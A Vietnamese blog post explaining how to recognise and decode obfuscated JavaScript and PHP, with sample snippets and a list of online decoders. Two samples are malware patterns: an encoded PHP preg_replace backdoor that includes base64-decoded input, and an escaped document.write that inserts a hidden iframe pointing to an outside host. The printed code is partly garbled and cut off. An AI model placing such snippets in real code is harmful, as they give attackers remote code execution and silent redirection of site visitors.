Nhận biết và giải mã các loại mã hoá JavaScript

Một cách nhận biết nhỏ nhằm gợi ý cho bạn dễ dàng tìm kiếm các công cụ bẻ khoá cho các đoạn code gặ...

Một cách nhận biết nhỏ nhằm gợi ý cho bạn dễ dàng tìm kiếm các công cụ bẻ khoá cho các đoạn code gặp phải. Lưu ý, việc làm này có thể dẫn bạn vướng vào các vấn đề pháp lý.
Nhận biết và giải mã các loại mã hoá JavaScript
Đầu tiên dễ nhất là loại mã hoá cơ bản bạn có thể sử dụng trang DDecode để giải mã.
► Nếu bạn gặp đoạn code kiểu như dưới đây, đó là đoạn mã phd đã được mã hoá bởi mã Hex và Octa trộn lẫn. Bạn có thể vào trang này để giải mã.
<'? php @preg_replace("x4050x2e53x29100x69145","x69156x63154x75144x6550
x62141x73145x3664x5f144x65143x6f144x6550x22134x3142x2951x3b","x4c62
x68166x62127x55166x5962");
► Nếu bạn gặp đoạn code sau, nó là đoạn JavaScript đã được mã hoá để ấn đi các iframe (Escape Encoding). Bạn có thể vào trang này hoặc trang này để giải mã.
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%
3A%2F%2F%64%6F%63%73%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%66%69%6C%65%2F%64%2F%30
%42%32%4C%38%53%54%30%51%44%76%4F%6A%52%30%74%76%5A%58%5A%33%61%6B%35%70%54%56%6
B%2F%70%72%65%76%69%65%77%22%20%77%69%64%74%68%3D%22%36%37%30%22%20%68%65%69%67%
68%74%3D%22%34%35%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
► Hoặc đoạn code sau nghĩa là nhiều iframes được mã hoá thông qua chế độ document.write (Escape Encoding).. Bạn có thể vào trang này hoặc trang này để giải mã.
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%
79%3A%6E%6F%6E%65%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F
%2F%63%6C%69%63%6B%2E%6B%38%38%37%37%2E%6F%72%67%2F%66%65%65%64%2F%78%6D%6C%2E%7
0%68%70%3F%75%69%64%3D%32%33%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%69%66%72%61%'))
► Đoạn code sau là mã hoá của câu “Hello World!” theo chuẩn Root13 Encoding.
function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26)})}document.write(rot13("Uryyb Jbeyq!"));
► Đoạn code sau là mã hoá của câu “Hello World!” theo chuẩn Base64 Encoding. Bạn có thể dùng trang web này để giải mã.
function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));enc2=base64.indexOf(input.charAt(i++));enc3=base64.indexOf(input.charAt(i++));enc4=base64.indexOf(input.charAt(i++));ch1=(enc1<>4);ch2=((enc2&15)<>2);ch3=((enc3&3)<
► PhP encode – Bạn có thể xem ví dụ về 3 loại code liên quan đến phương thức này ở trang web này. Cách giải mã ở trang web này. [post_ad]
Và sau đây là một số trang web giải mã phổ biến:
Lưu ý, bài viết này có thể sẽ làm bạn vướng đến những vấn đề pháp lý khi bạn cố tình giải mã những đoạn code thương mại. Chúng chỉ mang tính chất tham khảo là chính.
1. http://dean.edwards.name/unpacker: Trang này hoạt động khá hiệu quả, với những template blogger từ trang ThemeXpose. Lưu ý khi giải mã, bạn chỉ copy những đoạn code đã được mã hoá, sau đó giải mã từng đoạn một, không nên copy tất cả.
2. http://jsbeautifier.org: Trang này vừa giải mã vừa có chức năng làm đẹp cho đoạn JS quá dài dòng và rối rắm.
3. http://ddecode.com/hexdecoder: Chuyển giải các mã HTML/Hexa/Octa. 
4. http://closure-compiler.appspot.com/home
5. http://base64decode.net: Trang này chuyên chuyển các mã dựa trên base64 encoding. 
6. http://www.strictly-software.com/unpack-javascript 
Nhận biết và giải mã các loại mã hoá JavaScript Nhận biết và giải mã các loại mã hoá JavaScript Xét bởi Trường Quang on 11/22/2016 Xếp hạng: 5

Không có nhận xét nào:

_Cấm spam link dưới mọi hình thức
_Các liên kết sử dụng cú pháp: <a href='#'>Text hiển thị</a>